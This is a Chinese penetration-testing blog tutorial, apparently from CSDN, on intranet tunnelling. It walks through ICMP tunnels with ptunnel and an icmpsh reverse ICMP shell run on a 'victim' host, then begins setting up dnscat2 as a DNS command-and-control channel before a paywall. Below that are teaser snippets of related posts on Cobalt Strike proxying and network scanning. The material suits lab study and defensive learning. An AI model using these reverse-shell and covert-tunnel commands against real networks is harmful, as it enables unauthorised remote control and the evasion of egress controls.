内网穿透及端口转发(下)

最新推荐文章于 2025-06-06 15:12:57 发布
最新推荐文章于 2025-06-06 15:12:57 发布
阅读量2.6k 收藏 13
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 渗透测试 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44677409/article/details/103634375
本文详细介绍了多种内网穿透和端口转发工具的使用,包括ICMP隧道的ptunnel和icmpsh,DNS隧道的dnscat2与Iodine,以及Frp、Ngrok和N2n的配置和应用。通过这些工具,可以实现内网服务的外网访问和受限网络间的通信。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x05 ICMP隧道

注意:在搭建ICMP隧道的时候切记把自身的icmp关闭
(sysctl -w net.ipv4.icmp_echo_ignore_all=1)

ptunnel

ptunnel,全称“Ping Tunnel”,利用ICMP协议构建通信隧道,实现端到端通信。
网络环境拓扑:

image.png

B、C上需要装ptunnel工具,因为这里A只能ping通B,所以让B作为server,即ICMP跳板机

注意:由于通过ICMP协议建立隧道,为了让隧道服务端能够处理收到的ICMP报文,需要禁用系统本身的ICMP响应机制,防止内核响应ping数据包本身。这里先关闭B的ICMP响应机制,否则会出现[err]: Dropping duplicate proxy session request.报错。

在B上运行命令ptunnel

image.png

在C上运行命令

ptunnel -p 192.168.137.128 -lp 8888 -da 192.168.44.130  -dp 3389
-p  指定跳板机的IP
-lp 指定转发本地监听的端口
-da 指定最终要访问的目标主机
-dp 指定最终要访问目标主机的端口

image.png

此时ICMP隧道就已经打通了,最后在D上访问C的8888端口就相当于访问A的3389端口了

mstsc /v:192.168.137.129:8888

image.png

当然这里也可以让B既作为跳板机,又作为代理服务器

image.png

icmpsh

icmpsh是一个简单的反向ICMP shell,与其他类似的开源工具相比,其主要优势在于它不需要管理权限即可运行到目标计算机上。
网络环境拓扑:

image.png

首先在kali上下载icmpsh并关闭自身的icmp

./icmpsh-m.py <source IP address> <destination IP address>

sysctl -w net.ipv4.icmp_echo_ignore_all=1
python icmpsh_m.py 192.168.137.129 192.168.137.132

image.png

在受害机上运行以下命令

icmpsh.exe -t 192.168.137.129

image.png

返回kali查看shell

image.png

0x06 DNS隧道

dnscat2

内网出口一般对出站流量做了严格限制,但是通常不会限制 DNS 请求,也就是 UDP 53 请求。dnscat2是一款利用 DNS 协议创建加密 C2 隧道来控制服务器的工具。dnscat2 由客户端和服务端两部分组成。

初始化dnscat2服务端
Server部署
git clone https://github.com/iagox86/dnscat2.git
apt-get install ruby-dev 
cd dnscat2/server/ 
gem install bundler 
bundle install 
ruby ./dnscat2.rb  # 启动服务端

image.png

编译客户端
Client部署
最低0.47元/天 解锁文章
〖教程〗Ladon/Cobalt Strike/PortTran内网反向端口转发
K8哥哥
01-05 1154
版本 Ladon >=7.8 PortTran .NET端口转发工具,支持任意权限。 https://github.com/k8gege/PortTran 外网VPS监听 PortTranS.exe 8000 338 目标内网转发 PortTranC.exe 192.168.85.169 3389 192.168.85.142 8000 VPS连接3389 mstsc /console /v:127.0.0.1:338 自己连接3389 反向转发到VPS后,我们自己的机器连接VPS监听端口即为目
关于破解电信光猫实现内网穿透端口转发端口映射)
热门推荐
至道无难,唯嫌拣择。
01-25 7万+
背景: 最近在做一个视频监控的项目,为了实现将内网摄像头的数据传到互联网(公网)上,自己捣鼓了大半天的时间破解了光猫,现以tcp调试工具为例记录下这个过程 工具: 两台电脑,电信光猫F460,tcp调试工具 步骤与方法: 1,现在电信光猫对外的ip都不是公网ip,如果登陆电信光猫发现wan口ip是100. *. *. *,则不是公网ip,100.*这个网段是保留网段,专门留给电信运营商的...
内网端口转发及穿透
jsd2root的博客
03-07 2万+
最近尝试了一些内网端口转发内网穿透,现在一起总结一下。 0x01 正向和反向代理 正向代理中,proxy 和 client 同属一个 LAN,对 server 透明; 反向代理中,proxy 和 server 同属一个 LAN,对 client 透明。 实际上 proxy 在两种代理中做的事都是代为收发请求和响应,不过从结构上来看正好左右互换了下,所以把前者那种代理方式叫做正向代理,后...
Cobalt Strike(CS)主机作为跳板转发内网流量
最新发布
weixin_46607844的博客
06-06 677
socks4 [CS团队服务器IP] [Bind Port] # 例如 socks4 192.168.1.100 9050。proxychains curl http://10.10.10.50:8080 # 访问内网Web。proxychains nmap -sT -Pn -n 10.10.10.0/24 # 通过代理扫描。sudo nano /etc/proxychains.conf # 编辑配置。# 将内网Web 80端口转发到团队服务器2222端口。(若团队服务器在公网,需确保端口开放)
代理-穿透-转发
5L2g556F5ZWl77yf
08-24 977
文章目录frp手册代理类型SSH代理socks5代理NPSVenomshellsock5代理ngrockSSH 转发穿透正向转发 frp 手册 https://gofrp.org/docs/ 代理类型 类型 描述 tcp 单纯的 TCP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 udp 单纯的 UDP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 http 针对 HTTP 应用定制了一些额外的功能,例如修改 Host Header,增加鉴权。 https
内网穿透用服务器转发实现公网访问本地内网 frp服务搭建
IT赵云的博客
03-20 2951
简介 frp全名Fast Reverse Proxy, 是一个可用于内网穿透的高性能的反向代理应用,主要用于解决一些内网服务没有公网ip但是却需要提供外网访问的问题。使用frp可以将内网中的TCP、UDP、HTTP、HTTPS等协议类型的服务发布到公网,并且支持Web服务根据域名进行路由转发。 优点:小巧方便,部署简单 截至本文完成,frp的最新版本为v0.36.1,本文使用最新版本。 前置准备 云服务器一台(或者有公网ip的机器); 内网服务器一台; Frp脚本文件; .
内网穿透端口转发
lionwerson的博客
12-09 2987
1.在后渗透阶段,如果我们拿下了一台服务器的权限,发现在服务器所属的内网中有一台开启了3389或者22端口的主机,但是无法直接连接,是因为目标服务器处在内网中或者没有联网,这个时候我们可以借助内网中另一台可以联网的服务器来作为代理服务器与连接开启3389的服务器进行连接。 2.实验环境: 系统 用户 桥接 192.168.0.0/24 NAT 192.168.11.0/24 win10 管理员 192.168.0.16 ubuntu1 lion1
快速内网穿透教程,内网穿透教程,通过公网IP服务器进行数据流量转发
旋律 | 话语 | 色彩 | 情景
08-10 2746
内网穿透教程,通过公网IP服务器进行数据流量转发
QT内网穿透端口映射)工具及源代码
04-08
基于QT端口映射,远程访问内网,远程桌面,内网穿透,服务器转发
内网穿透 - 端口转发
04-25
内网穿透技术,也称为NAT穿透,是解决在内网环境下设备无法被公网直接访问问题的一种网络技术。本文将详细介绍如何使用socket编程与IOCP(I/O完成端口)模型来实现端口转发,以及涉及到的相关文件及其作用。 首先,...
易语言-端口转发工具源码 内网穿透,类似LCX
06-25
端口转发工具源码 内网穿透,类似LCX 最近在用云服务器写点东西,服务器的CPU有点吃不消,于是想到了使用云服务器作为跳板,转到家里的机子,但是天朝的忘了都是局域网... 于是写了这个小工具... 用法类似LCX,需要一台有...
http-tunnel(隧道)
01-22
QQ上网代理,能够在突破端口限制!!!!!!!!!!!!!!!!!
SSH端口转发实现内网穿透的实现
09-14
主要介绍了SSH端口转发实现内网穿透的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
内网穿透-端口转发
cooper的笔记本
02-25 1303
内网穿透--端口转发
frp 从0搭建内网穿透
跳动的石头
10-28 1214
手把手在自己服务器实现内网穿透
CobaltStrike使用-第八篇-隧道技术(socks转发、ssh隧道、CS转发监听器)
Love&Share
12-07 5383
文章目录流量转发Socks转发MSF 连接到 Socks 代理服务使用 ProxyChains 进行代理转发转发监听器(反向链接)SSH隧道参考链接 本篇文章将会结合CS介绍在内网渗透中经常用到的隧道技术,这已经是第二次介绍隧道技术了,本篇环境将会比第一篇复杂,第一篇链接在这,我是链接 流量转发 Socks转发 目前已经拿到了server2008-2的会话,但是域控主机在内网,不能和CS TeamServer直接通信,所以需要添加代理转发 在进行转发操作之前,需要将当前会话改为交互模式,也就是说输入命.
隧道工具ptunnle
分享学习网络的点点滴滴
10-09 466
通过ICMP echo(ping requests)和reply(ping reply)实现隧道。ptunnel直到目前的最新版仍存在拒绝服务漏洞,最新版本为0.72。适用于防火墙只允许ping出站流量的环境。支持多并发连接,性能优。
ptunnel详细使用教程
星落的博客
05-16 2万+
ptunnle简介 适用条件 ptunnle常用命令 实例演示-传输数据
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
huayimy的博客
01-02 2649
服务端(中间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网中转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
qt内网穿透端口转发
10-03
Qt内网穿透端口转发是一种将内网中的局域网设备通过穿透技术映射到公网上,实现公网访问的方法。Qt是一种跨平台的C++应用程序开发框架,可以用于编写各种类型的应用程序,包括网络通讯相关的应用。 内网穿透端口转发的实现原理是通过在 NAT 中间人攻击方式,将公网的请求转发到内网中指定设备的指定端口上,从而实现对内网设备的访问。Qt 提供了一些网络编程接口和类,可以用于实现内网穿透端口转发功能。 在 Qt 中实现内网穿透端口转发,可以使用 Qt 的网络编程库进行开发。首先需要创建一个 TCP 服务端,监听公网的请求。当收到请求后,根据请求的目标设备和目标端口,在内网中找到对应的设备,并将请求转发到该设备的指定端口上。 具体步骤如下: 1. 创建一个 QTcpServer 对象,调用其 listen 方法,监听指定的公网端口。 2. 当收到公网请求时,QTcpServer 会触发一个新连接的信号。 3. 在新连接的槽函数中,获取请求的目标设备和目标端口。 4. 在内网中找到对应的设备和端口,创建一个 QTcpSocket 对象,连接到该设备的指定端口上。 5. 将公网请求的数据通过 QTcpSocket 的 write 方法发送到内网设备。 6. 同时监听 QTcpSocket 的 readyRead 信号,当内网设备返回数据时,通过 QTcpServer 的 write 方法将数据返回给公网。 通过以上步骤,就可以实现 Qt 内网穿透端口转发的功能。需要注意的是,为了确保内网设备的安全性,应当对公网请求进行必要的身份验证和安全控制。同时,在代码实现中,还需要处理异常情况和错误处理,确保端口转发的稳定性和可靠性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值